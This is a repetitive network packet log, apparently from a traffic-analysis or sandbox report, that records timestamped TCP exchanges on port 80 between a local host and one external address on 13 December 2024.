                                              Dec 13, 2024 10:49:15.989099979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.989162922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.991022110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.991101980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.991153002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.991193056 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.993048906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.993102074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.993161917 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.993207932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.995132923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.995206118 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.995230913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.995244980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.997117043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.997188091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.997271061 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.997422934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.999166965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.999211073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:15.999386072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:15.999423981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.001147032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.001194000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.001250982 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.001295090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.003233910 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.003277063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.003371000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.005228996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.005285025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.005333900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.005373955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.007214069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.007272005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.007335901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.007462025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.009259939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.009315968 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.009397030 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.009531975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.011384964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.011451006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.011457920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.011493921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.013299942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.013350964 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.013492107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.013540030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.015386105 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.015454054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.015499115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.017469883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.017533064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.017573118 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.017608881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.019479990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.019551992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.019583941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.019759893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.021554947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.021627903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.021641016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.021666050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.023483992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.023577929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.023610115 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.023653030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.025533915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.025582075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.025654078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.025700092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.027420998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.027482033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.027525902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.027698040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.029386044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.029438019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.029453993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.029491901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.031302929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.031358957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.031362057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.031402111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.034617901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.034693003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.064783096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.064851046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.064855099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.064888954 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.065201998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.065252066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.065315008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.065387011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.066162109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.066206932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.066286087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.066324949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.067030907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.067091942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.067378998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.067430019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.067475080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.067600965 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.068274975 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.068340063 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.068417072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.068552017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.069185972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.069269896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.069308043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.069356918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.070183039 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.070234060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.070252895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.070302010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.071003914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.071063042 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.071151972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.071230888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.071971893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.072027922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.072114944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.072175026 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.072942972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.072987080 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.073019028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.073054075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.073843956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.073884964 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.073971987 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.074009895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.074723005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.074768066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.074829102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.074875116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.075685024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.075743914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.075814962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.075887918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.076589108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.076637030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.076643944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.076679945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.077496052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.077538013 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.077548027 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.077581882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.078479052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.078530073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.078536034 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.078574896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.079368114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.079421997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.079485893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.079570055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.080287933 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.080338001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.080369949 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.080408096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.081232071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.081291914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.081341982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.082168102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.082231045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.082231045 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.082370043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.083070040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.083129883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.083136082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.083177090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.083956003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.084038973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.084105015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.084150076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.084897995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.084954977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.084984064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.085026026 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.085808992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.085867882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.085881948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.085922956 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.086781979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.086853981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.086858034 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.086901903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.087652922 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.087707043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.087733030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.087744951 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.088589907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.088654995 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.088685036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.088730097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.089497089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.089541912 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.089576006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.089627028 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.090432882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.090476990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.090545893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.090586901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.091370106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.091379881 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.091423988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.174361944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.174429893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.174513102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.174560070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.174834013 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.174880981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.174907923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.174984932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.175741911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.175806046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.175827980 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.175878048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.176646948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.176703930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.176770926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.176896095 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.177571058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.177628994 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.177659988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.177704096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.178487062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.178550959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.178584099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.178673029 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.179363012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.179419994 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.179497004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.179596901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.180334091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.180433989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.180444956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.180483103 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.181273937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.181315899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.181390047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.181430101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.182158947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.182204962 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.182250023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.182327032 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.183124065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.183224916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.183254957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.183290958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.184071064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.184118032 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.184140921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.184190035 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.184954882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.185008049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.185064077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.185142040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.185857058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.185909986 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.185952902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.186794996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.186841965 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.186901093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.186947107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.187726974 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.187774897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.187818050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.187865019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.188644886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.188724041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.188751936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.188808918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.189565897 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.189613104 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.189677954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.189755917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.190572023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.190593958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.190640926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.190640926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.191426992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.191476107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.191493988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.191530943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.192372084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.192433119 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.192451954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.192491055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.193248987 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.193305016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.193361044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.193433046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.194197893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.194251060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.194289923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.194478035 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.195096970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.195148945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.256931067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.256997108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.256998062 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.257036924 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.257323027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.257366896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.257386923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.257421970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.258225918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.258301020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.258388042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.258430004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.259162903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.259212017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.259449005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.259494066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.259573936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.259618044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.260401011 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.260504961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.260555029 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.261287928 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.261398077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.261459112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.262213945 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.262284040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.262319088 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.262357950 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.263195992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.263254881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.263290882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.263473988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.264077902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.264147043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.264162064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.264204025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.264997959 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.265047073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.265083075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.265121937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.265912056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.265957117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.266014099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.266057014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.266843081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.266887903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.266925097 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.266974926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.267759085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.267812014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.267829895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.268013954 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.268678904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.268728971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.268801928 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.268841028 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.269591093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.269637108 CET4985880192.168.2.680.82.65.70
